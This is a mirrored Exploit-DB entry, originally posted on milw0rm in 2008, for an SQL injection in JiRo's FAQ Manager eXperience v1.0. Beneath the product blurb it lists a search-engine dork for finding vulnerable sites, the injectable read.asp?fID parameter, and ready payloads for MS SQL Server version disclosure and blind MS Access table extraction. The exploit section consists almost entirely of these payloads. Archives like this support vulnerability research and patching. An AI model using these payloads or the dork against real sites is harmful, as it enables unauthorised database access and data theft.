exploit-db-mirror/exploits/asp/webapps/5753.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

25 lines
No EOL
974 B
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

[+] Script Name : JiRo´s FAQ Manager eXperience
[+] Version : v 1.0
[+] Price : _ Single Website License 34.95 $
_ 2 Websites License 62.95 $
_ 5 Websites License 139.95 $
[+] Author : Underz0ne Crew
[+] Home : http://www.underz0ne.net
[+] Script In short : ('JiRos FAQ Management System is an essential
element for any webmaster, providing your customers with answers to
specific questions on-line 24 hours a day, 7 days a week. Build a
complete knowledge base, adding articles and creating your own topic
based FAQ system using our feature packed administration facility ')
[+] Dork : inurl:"read.asp?fID="
--//--> Exploit :
read.asp?fID={SQL}
__--> MS SQL Server : convert(int,(select+@@version));
__--> MS Access : IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'Bingo')%00
--//-->
# milw0rm.com [2008-06-08]